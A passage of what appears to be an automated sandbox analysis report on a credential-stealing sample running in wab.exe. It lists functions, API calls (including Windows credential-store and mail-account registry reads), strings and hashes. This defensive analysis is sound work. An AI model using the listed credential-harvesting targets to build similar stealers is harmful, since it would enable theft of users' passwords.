                                                                                                                                                                                                                    • Opcode ID: 29e67128f806e27f32a5a844b83660c965dc1796d59f1ea4f69cdb33fe82b5c1
                                                                                                                                                                                                                    • Instruction ID: 4af0f314ee18ccde9e1bafe1ac3c0a9422d02a762a4adf5b984e4b61dd213191
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 29e67128f806e27f32a5a844b83660c965dc1796d59f1ea4f69cdb33fe82b5c1
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A961CA72A00218AFDB10EF75DC81BAE73A8AF04318F12457BF915E7281D678EE548799
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00402FCD Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 106registryCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00410411: RegOpenKeyExA.KERNELBASE(00401C4B,00401C4B,00000000,00020019,?,00401C4B,?,?,?), ref: 00410424
                                                                                                                                                                                                                    • memset.MSVCRT ref: 00403010
                                                                                                                                                                                                                      • Part of subcall function 004104D7: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 004104FA
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040305D
                                                                                                                                                                                                                    • sprintf.MSVCRT ref: 00403075
                                                                                                                                                                                                                    • memset.MSVCRT ref: 004030A6
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 004030EE
                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00403117
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memset$Close$EnumOpensprintf
                                                                                                                                                                                                                    • String ID: %s\Accounts$Identity$Software\IncrediMail\Identities
                                                                                                                                                                                                                    • API String ID: 3672803090-3168940695
                                                                                                                                                                                                                    • Opcode ID: 7c98ea0b3754888334cffa6cf5d7d188fa79ef3fb5e75e3e96ead78b92b55a2f
                                                                                                                                                                                                                    • Instruction ID: 39077b7eb5a2e68ecd5ff501a3ad8ea0a91829c9588d8d8ee698511e4ba158b1
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7c98ea0b3754888334cffa6cf5d7d188fa79ef3fb5e75e3e96ead78b92b55a2f
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EE3130B580021CFBDB11EB91CC82EEEBB7CAF15305F0041B6BA08A1152E7799F949F95
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00408C8C Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowstringCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Menu$Itemmemset$CountInfoModify_mbscatstrchr
                                                                                                                                                                                                                    • String ID: 0$6
                                                                                                                                                                                                                    • API String ID: 3540791495-3849865405
                                                                                                                                                                                                                    • Opcode ID: 74127b3a6ace4faeac3cb74118fb5aab17d7e36bf865af1988a44d13d40aa2ee
                                                                                                                                                                                                                    • Instruction ID: 3c8b7fd7a28504c7ca875bf426ab9eeebffe21bfd5384a9a2131e9ee4f2c6c2c
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 74127b3a6ace4faeac3cb74118fb5aab17d7e36bf865af1988a44d13d40aa2ee
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CB31AD72408384AFD7209F91D940A9BBBE9EF84354F04493FFAC4A2291D778D9548F6A
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00418FCA Relevance: 15.3, APIs: 6, Strings: 4, Instructions: 319COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy$strlen
                                                                                                                                                                                                                    • String ID: -journal$-wal$immutable$nolock
                                                                                                                                                                                                                    • API String ID: 2619041689-3408036318
                                                                                                                                                                                                                    • Opcode ID: b4afe22544acede0a86ca576d850925b04083d6883ca1ee22da99f70356edf55
                                                                                                                                                                                                                    • Instruction ID: 01a3cfc3161f2179d827f175e8c33b529befff994fa447307002f7c0b3a07cf5
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b4afe22544acede0a86ca576d850925b04083d6883ca1ee22da99f70356edf55
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C7C1F372A04606AFDB14DFA9C841BDEFFB0BF44314F14825EE428E7281D778A994CB95
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004019E9 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 195stringCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??3@$strlen
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 4288758904-3916222277
                                                                                                                                                                                                                    • Opcode ID: 84b328311e417d15e7997145b2c24fd86ffd8b147b4043e2eff3435c1be22cd3
                                                                                                                                                                                                                    • Instruction ID: 24b34d1c19d378cbc4a311a34392409bda21909db6314ed607bd163125115c99
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 84b328311e417d15e7997145b2c24fd86ffd8b147b4043e2eff3435c1be22cd3
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6A61873440D782DFDB609F25948006BBBF0FB89315F54593FF5D2A22A1D739984ACB0A
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00408458 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 152COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 004045D6: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F07D,?,00000000), ref: 004045E3
                                                                                                                                                                                                                      • Part of subcall function 004045D6: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 004045FC
                                                                                                                                                                                                                      • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredFree), ref: 00404608
                                                                                                                                                                                                                      • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404614
                                                                                                                                                                                                                      • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404620
                                                                                                                                                                                                                      • Part of subcall function 004045D6: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 0040462C
                                                                                                                                                                                                                    • wcslen.MSVCRT ref: 004084C2
                                                                                                                                                                                                                    • _wcsncoll.MSVCRT ref: 00408506
                                                                                                                                                                                                                    • memset.MSVCRT ref: 0040859A
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 004085BE
                                                                                                                                                                                                                    • wcschr.MSVCRT ref: 00408612
                                                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,?,?,?,?,?), ref: 0040863C
                                                                                                                                                                                                                      • Part of subcall function 00404780: FreeLibrary.KERNELBASE(?,?,0040F171,?,00000000), ref: 00404795
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: AddressProc$FreeLibrary$LoadLocal_wcsncollmemcpymemsetwcschrwcslen
                                                                                                                                                                                                                    • String ID: J$Microsoft_WinInet
                                                                                                                                                                                                                    • API String ID: 1371990430-260894208
                                                                                                                                                                                                                    • Opcode ID: 16b20249654c67f53eccac8b236a4263c6876ac6a245db74242d08f005f31d3d
                                                                                                                                                                                                                    • Instruction ID: daadb017bf7cdd7d7f2103bea61dec75ef30dccaf082131e005dcc9144427660
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 16b20249654c67f53eccac8b236a4263c6876ac6a245db74242d08f005f31d3d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D55115B1508346AFD720DF65C980A5BB7E8FF89304F00492EF998D3251EB39E918CB56
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0041025A Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 64COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410277
                                                                                                                                                                                                                    • UuidFromStringA.RPCRT4(220D5CC1-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 0041028B
                                                                                                                                                                                                                    • UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410298
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 004102D6
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • 220D5CD1-853A-11D0-84BC-00C04FD43F8F, xrefs: 0041027F
                                                                                                                                                                                                                    • 220D5CD0-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410272
                                                                                                                                                                                                                    • 220D5CC1-853A-11D0-84BC-00C04FD43F8F, xrefs: 00410286
                                                                                                                                                                                                                    • 417E2D75-84BD-11D0-84BB-00C04FD43F8F, xrefs: 00410293
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: FromStringUuid$memcpy
                                                                                                                                                                                                                    • String ID: 220D5CC1-853A-11D0-84BC-00C04FD43F8F$220D5CD0-853A-11D0-84BC-00C04FD43F8F$220D5CD1-853A-11D0-84BC-00C04FD43F8F$417E2D75-84BD-11D0-84BB-00C04FD43F8F
                                                                                                                                                                                                                    • API String ID: 2859077140-2022683286
                                                                                                                                                                                                                    • Opcode ID: 8ab31fcad472c8e0f7fc1e7956a4c0916ede4aff3821f8ba5262597d6c198381
                                                                                                                                                                                                                    • Instruction ID: e4eb6b96217285778323d40e2be480743d786dbe6d4556737564963462aa5f63
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8ab31fcad472c8e0f7fc1e7956a4c0916ede4aff3821f8ba5262597d6c198381
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CC116D7290012EABDF11DEA4DC85EEB37ACEB49354F050423FD41E7201E6B8DD848BA6
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00406A1A Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarystringwindowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • LoadLibraryExA.KERNEL32(netmsg.dll,00000000,00000002), ref: 00406A3F
                                                                                                                                                                                                                    • FormatMessageA.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000), ref: 00406A5D
                                                                                                                                                                                                                    • strlen.MSVCRT ref: 00406A6A
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 00406A7A
                                                                                                                                                                                                                    • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00406A84
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 00406A94
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: _mbscpy$FormatFreeLibraryLoadLocalMessagestrlen
                                                                                                                                                                                                                    • String ID: Unknown Error$netmsg.dll
                                                                                                                                                                                                                    • API String ID: 2881943006-572158859
                                                                                                                                                                                                                    • Opcode ID: a50973e00e0714efe879abe5d0fa4de51feb90d783acbf5609d176ef6c22eee5
                                                                                                                                                                                                                    • Instruction ID: d85fce99d4424776e4d89386e5c8d6134dfcbe96067fcf7c7fc9c3f577b26335
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a50973e00e0714efe879abe5d0fa4de51feb90d783acbf5609d176ef6c22eee5
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0801F7316001147FEB147B51EC46F9F7E28EB06791F21407AFA06F0091DA795E209AAC
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00404A94 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB3
                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404AC5
                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00404AD9
                                                                                                                                                                                                                    • MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B04
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                                                                                                                    • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                                                                                    • API String ID: 2780580303-317687271
                                                                                                                                                                                                                    • Opcode ID: 0605f619fc244978403acb2e7e50909fcfc2fbf3368997ac03ccd37e60a8c8f1
                                                                                                                                                                                                                    • Instruction ID: 36f372293bcd99ea712e996d8bb82ea6b99e6deebf99936071b003413e9982ca
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0605f619fc244978403acb2e7e50909fcfc2fbf3368997ac03ccd37e60a8c8f1
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 860149797516103BEB115BB19C49F7FBAACDB8674AF010035F602F2182DEBCC9018A5D
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 004093DD Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 00406D1F: GetFileAttributesA.KERNELBASE(?,00401EDD,?), ref: 00406D23
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 004093F7
                                                                                                                                                                                                                    • _mbscpy.MSVCRT ref: 00409407
                                                                                                                                                                                                                    • GetPrivateProfileIntA.KERNEL32(00451308,rtl,00000000,00451200), ref: 00409418
                                                                                                                                                                                                                      • Part of subcall function 00408FE9: GetPrivateProfileStringA.KERNEL32(00451308,?,0044551F,00451358,?,00451200), ref: 00409004
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: PrivateProfile_mbscpy$AttributesFileString
                                                                                                                                                                                                                    • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                                                                                                                    • API String ID: 888011440-2039793938
                                                                                                                                                                                                                    • Opcode ID: e990c3cc62237e0bab40cac14584cc26f7b64a30e3fa44b4e874bacec4a6fec9
                                                                                                                                                                                                                    • Instruction ID: 0b3e14b162d046b550c41b249f06feb679facb3af2f7b05e7ff0b413a15a09bb
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e990c3cc62237e0bab40cac14584cc26f7b64a30e3fa44b4e874bacec4a6fec9
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C6F09621F8435136FB203B325C03F2E29488BD2F56F1640BFBD08B65D3DAAD8811559E
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0042DF2E Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 272COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    • too many attached databases - max %d, xrefs: 0042DF97
                                                                                                                                                                                                                    • out of memory, xrefs: 0042E235
                                                                                                                                                                                                                    • unable to open database: %s, xrefs: 0042E21C
                                                                                                                                                                                                                    • database is already attached, xrefs: 0042E0DD
                                                                                                                                                                                                                    • cannot ATTACH database within transaction, xrefs: 0042DFAC
                                                                                                                                                                                                                    • attached databases must use the same text encoding as main database, xrefs: 0042E12C
                                                                                                                                                                                                                    • database %s is already in use, xrefs: 0042E014
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpymemset
                                                                                                                                                                                                                    • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                                                                                                                    • API String ID: 1297977491-2001300268
                                                                                                                                                                                                                    • Opcode ID: 6ddab01290ce87d8ebd2da98a857a844c731627c1ed98d62f1e76250c556fc69
                                                                                                                                                                                                                    • Instruction ID: c7e7a29d1825d2e945301ab40bb758a3ed070f64a4837571caa387bbb47581b8
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6ddab01290ce87d8ebd2da98a857a844c731627c1ed98d62f1e76250c556fc69
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BFA1BC70608311DFD720DF2AE441A6BBBE4BF88318F54492FF48987252D778E945CB9A
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00409989 Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 157COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097AB
                                                                                                                                                                                                                      • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097B9
                                                                                                                                                                                                                      • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097CA
                                                                                                                                                                                                                      • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097E1
                                                                                                                                                                                                                      • Part of subcall function 0040979F: ??3@YAXPAX@Z.MSVCRT ref: 004097EA
                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 004099C0
                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 004099DC
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 00409A04
                                                                                                                                                                                                                    • memcpy.MSVCRT ref: 00409A21
                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 00409AAA
                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 00409AB4
                                                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 00409AEC
                                                                                                                                                                                                                      • Part of subcall function 00408B27: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408BF0
                                                                                                                                                                                                                      • Part of subcall function 00408B27: memcpy.MSVCRT ref: 00408C2F
                                                                                                                                                                                                                      • Part of subcall function 00408B27: _mbscpy.MSVCRT ref: 00408BA2
                                                                                                                                                                                                                      • Part of subcall function 00408B27: strlen.MSVCRT ref: 00408BC0
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: ??2@??3@$memcpy$LoadString_mbscpystrlen
                                                                                                                                                                                                                    • String ID: $$d
                                                                                                                                                                                                                    • API String ID: 2915808112-2066904009
                                                                                                                                                                                                                    • Opcode ID: aaabb9704ee97ed3d88bb120afced9611e84c7ee3aa1941d020b92fe57cbaf77
                                                                                                                                                                                                                    • Instruction ID: c499689f9fa1b304e99f77f7c015d52b7a22264b22564a6ed79451bf6b5d1632
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aaabb9704ee97ed3d88bb120afced9611e84c7ee3aa1941d020b92fe57cbaf77
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A6513B71601704AFD724DF69C582B9AB7F4BF48354F10892EE65ADB282EB74A940CF44
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00403158 Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 100stringCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                      • Part of subcall function 0040312A: GetPrivateProfileStringA.KERNEL32(00000000,?,0044551F,?,?,?), ref: 0040314E
                                                                                                                                                                                                                    • strchr.MSVCRT ref: 0040326D
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: PrivateProfileStringstrchr
                                                                                                                                                                                                                    • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                                                                                                                                                                                    • API String ID: 1348940319-1729847305
                                                                                                                                                                                                                    • Opcode ID: 744f29d2d2deae3fb126fd39ba5d775996f393179d4ac578be52819d2814d06a
                                                                                                                                                                                                                    • Instruction ID: ebc3817507c74d0428b70d6b21ed795ce2a60aa758e9561c8f94ff6eeee5590f
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 744f29d2d2deae3fb126fd39ba5d775996f393179d4ac578be52819d2814d06a
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4A318F7090420ABEEF219F60CC45BD9BFACEF14319F10816AF9587A1D2D7B89B948B54
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0041096F Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 60COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                                                    • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                                                                                                    • API String ID: 3510742995-3273207271
                                                                                                                                                                                                                    • Opcode ID: 5f1fb5d69f7b5319dba649b4cfeeb14085fd9f05635fb8ab0532745b2c558304
                                                                                                                                                                                                                    • Instruction ID: 3875996c88d7773ad821c0e973cab4ee718d2e20412430da402bf8ed1fec6725
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5f1fb5d69f7b5319dba649b4cfeeb14085fd9f05635fb8ab0532745b2c558304
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DF01D4F7EE469869FB3100094C23FEB4A8947A7720F360027F98525283A0CD0CD3429F
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 00405E41 Relevance: 13.6, APIs: 9, Instructions: 58windowCOMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 00405E58
                                                                                                                                                                                                                    • GetWindow.USER32(?,00000005), ref: 00405E70
                                                                                                                                                                                                                    • GetWindow.USER32(00000000), ref: 00405E73
                                                                                                                                                                                                                      • Part of subcall function 004015AF: GetWindowRect.USER32(?,?), ref: 004015BE
                                                                                                                                                                                                                      • Part of subcall function 004015AF: MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004015D9
                                                                                                                                                                                                                    • GetWindow.USER32(00000000,00000002), ref: 00405E7F
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003ED), ref: 00405E96
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000000), ref: 00405EA8
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000000), ref: 00405EBA
                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003ED), ref: 00405EC8
                                                                                                                                                                                                                    • SetFocus.USER32(00000000), ref: 00405ECB
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 0000000A.00000002.49603307262.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                    • Snapshot File: hcaresult_10_2_400000_wab.jbxd
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: Window$Item$Rect$ClientFocusPoints
                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                    • API String ID: 2432066023-0
                                                                                                                                                                                                                    • Opcode ID: 859c870cb1f45ac1f52eef33470e4ab1ec2daf0450f8b20d97580b530be0d20d
                                                                                                                                                                                                                    • Instruction ID: 4031fba040b0e189dacc9fafa17b87c2e22a92f85e78ae2064a779fcc19fa509
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 859c870cb1f45ac1f52eef33470e4ab1ec2daf0450f8b20d97580b530be0d20d
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AE01E571500708AFDB112B62DC89E6BBFACEF81324F11442BF5449B252DBB8E8008E28
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    Function 0040F2E4 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 133COMMON
                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                    APIs
